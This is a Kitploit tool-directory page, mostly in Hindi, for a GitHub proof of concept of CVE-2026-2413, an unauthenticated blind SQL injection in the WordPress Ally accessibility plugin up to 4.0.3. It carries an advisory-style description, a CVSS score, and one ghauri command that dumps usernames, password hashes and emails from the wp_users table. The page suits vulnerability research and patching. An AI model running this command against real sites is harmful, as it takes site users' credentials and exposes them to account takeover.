Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-2413 — Ally – वेब एक्सेसिबिलिटी और उपयोगिता <= 4.0.3 - URL पथ के माध्यम से बिना प्रमाणीकरण के SQL इंजेक्शन | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2026-2413
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2026-2413

CVE-2026-2413

Ally – वेब एक्सेसिबिलिटी और उपयोगिता <= 4.0.3 - URL पथ के माध्यम से बिना प्रमाणीकरण के SQL इंजेक्शन

रिपॉजिटरी देखें
46 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-2413

Ally – Web Accessibility & Usability <= 4.0.3 - URL पथ के माध्यम से बिना प्रमाणीकरण के SQL इंजेक्शन

विवरण

WordPress के लिए Ally – Web Accessibility & Usability प्लगइन, संस्करण 4.0.3 तक (4.0.3 सहित) के सभी संस्करणों में URL पथ के माध्यम से SQL इंजेक्शन के प्रति संवेदनशील है। इसका कारण get_global_remediations() विधि में उपयोगकर्ता द्वारा आपूर्ति किए गए URL पैरामीटर पर अपर्याप्त एस्केपिंग है, जहाँ इसे SQL संदर्भ के लिए उचित सैनिटाइज़ेशन के बिना सीधे SQL JOIN क्लॉज़ में जोड़ा जाता है। जबकि URL सुरक्षा के लिए esc_url_raw() लागू किया जाता है, यह SQL मेटा-कैरेक्टर्स (सिंगल कोट्स, पैरेंथेसिस) को इंजेक्ट होने से नहीं रोकता है। इससे बिना प्रमाणीकरण वाले हमलावरों के लिए मौजूदा क्वेरीज़ में अतिरिक्त SQL क्वेरीज़ जोड़ना संभव हो जाता है, जिनका उपयोग टाइम-बेस्ड ब्लाइंड SQL इंजेक्शन तकनीकों के माध्यम से डेटाबेस से संवेदनशील जानकारी निकालने के लिए किया जा सकता है। Remediation मॉड्यूल सक्रिय होना चाहिए, जिसके लिए प्लगइन को किसी Elementor खाते से कनेक्ट होना आवश्यक है।

विस्तृत जानकारी

  • प्रकार: प्लगइन
  • स्लग: pojo-accessibility
  • प्रभावित संस्करण:
  • CVSS स्कोर: 7.5
  • CVSS रेटिंग: उच्च
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2026-2413

POC

ghauri -u "http://localhost:9001/x*" --technique=E --dbms=mysql --batch --ignore-code 404 --skip-urlencode --prefix="'" --suffix="OR'" -D wordpress -T wp_users -C user_login,user_pass,user_email --dump
टूल डाउनलोड करें